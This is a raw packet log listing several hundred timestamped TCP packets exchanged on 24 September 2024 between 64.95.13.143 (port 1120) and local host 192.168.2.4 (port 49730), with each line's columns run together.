Sep 24, 2024 17:46:10.887255907 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.887263060 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.887264967 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.887270927 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.887289047 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.887305021 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.887660980 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.887676954 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.887684107 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.887686968 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.887697935 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.887708902 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.887722015 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.887727976 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.887753010 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.888150930 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.888164043 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.888175011 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.888185978 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.888190985 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.888199091 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.888206959 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.888211966 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.888223886 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.888235092 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.888254881 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.888899088 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.888911009 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.888921976 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.888945103 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.888946056 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.888956070 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.888961077 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.888992071 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.889017105 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.889856100 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.889869928 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.889885902 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.889897108 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.889902115 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.889903069 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.889921904 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.889942884 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.889960051 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.890667915 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.890678883 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.890690088 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.890697002 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.890707016 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.890717983 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.890727997 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.890759945 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.891911030 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.891925097 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.891937017 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.891952991 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.891964912 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.905675888 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.905683041 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.905689001 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.905736923 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.905970097 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.905983925 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.905994892 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.906006098 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.906017065 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.906030893 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.906573057 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.906589985 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.906596899 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.906672001 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.907032967 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.907043934 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.907054901 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.907067060 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.907078028 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.907120943 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.907174110 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.907929897 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.907942057 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.907953978 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.907964945 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.907974958 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.907987118 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.908001900 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.908029079 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.908056974 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.960577965 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.960628986 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.960644960 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.960685968 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.961072922 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.961085081 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.961097002 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.961107969 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.961127043 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.961167097 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.966953039 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.966970921 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.966984034 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.967010021 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.967040062 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.967185974 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.967199087 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.967210054 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.967221022 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.967231989 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.967256069 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.968015909 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.968036890 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.968048096 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.968058109 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.968063116 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.968070030 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.968081951 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.968099117 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.968131065 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.968693972 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.968708992 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.968720913 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.968730927 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.968739033 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.968749046 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.968772888 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.968801975 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.969615936 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.969629049 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.969640017 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.969650984 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.969666004 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.969671965 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.969675064 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.969690084 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.969724894 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.970673084 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.970690012 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.970700026 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.970711946 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.970722914 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.970735073 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.970743895 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.970773935 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.971473932 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.971494913 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.971507072 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.971522093 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.971529007 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.971534014 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.971555948 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.971586943 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.972569942 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.972585917 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.972596884 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.972609043 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.972620010 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.972626925 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.972631931 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.972647905 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.972666025 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.973289013 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.973304987 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.973311901 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.973321915 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.973337889 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.973347902 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.973361015 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.973376036 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.973395109 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.974184036 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.974198103 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.974209070 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.974220037 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.974231958 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.974265099 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.974893093 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.974915981 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.974925995 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.974936962 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.974946022 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.974946976 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.974965096 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.974970102 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.974977016 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.975004911 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.975028992 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.975831985 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.975845098 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.975855112 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.975867033 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.975877047 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.975888014 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.975894928 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.975900888 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.975931883 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.976713896 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.976727009 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.976737022 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.976747990 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.976758003 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.976759911 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.976772070 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.976778030 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.976783991 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.976815939 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.976835012 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.977855921 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.977869987 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.977879047 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.977906942 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.977919102 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.977926016 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.977930069 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.977943897 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.977952003 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.977967024 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.979228973 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.979237080 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.979295969 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.998286009 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.998347044 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.998353004 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.998364925 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.998409033 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.998595953 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.998608112 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.998617887 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.998629093 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.998644114 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.998658895 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.999178886 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.999193907 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.999206066 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.999264956 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.999703884 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.999716997 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.999727964 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.999739885 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.999749899 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:10.999758005 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:10.999800920 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.000507116 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.000519037 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.000530005 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.000540018 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.000551939 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.000565052 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.000586033 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.001048088 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.001060009 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.001094103 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.045062065 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.053037882 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.053126097 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.053138971 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.053204060 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.053455114 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.053466082 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.053478003 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.053489923 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.053497076 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.053519011 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.059911966 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.059922934 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.059933901 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.059983969 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.059986115 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.059997082 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.060008049 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.060022116 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.060046911 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.060072899 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.060583115 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.060671091 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.060682058 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.060693026 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.060703039 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.060709000 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.060715914 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.060729980 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.060761929 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.061391115 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.061403036 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.061414003 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.061424971 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.061435938 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.061441898 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.061446905 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.061460972 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.061491013 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.062211037 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.062222958 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.062233925 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.062243938 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.062254906 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.062266111 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.062274933 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.062300920 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.063077927 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.063093901 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.063107014 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.063119888 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.063133001 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.063137054 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.063159943 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.064059019 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.064070940 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.064089060 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.064100027 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.064099073 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.064112902 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.064125061 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.064127922 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.064140081 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.064151049 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.064184904 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.064641953 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.064717054 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.064735889 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.064747095 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.064758062 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.064763069 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.064779997 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.065530062 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.065541983 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.065551996 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.065562963 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.065568924 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.065576077 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.065587044 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.065588951 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.065615892 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.066350937 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.066364050 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.066374063 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.066385031 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.066389084 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.066396952 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.066409111 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.066409111 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.066421032 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.066441059 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.066457987 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.067045927 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.067058086 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.067066908 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.067078114 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.067089081 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.067090988 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.067100048 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.067111015 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.067123890 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.067142963 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.067866087 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.067878962 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.067907095 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.067986012 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.067996979 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.068006039 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.068017006 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.068023920 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.068027973 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.068044901 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.068044901 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.068056107 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.068070889 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.068093061 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.068938971 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.068950891 CEST11204973064.95.13.143192.168.2.4
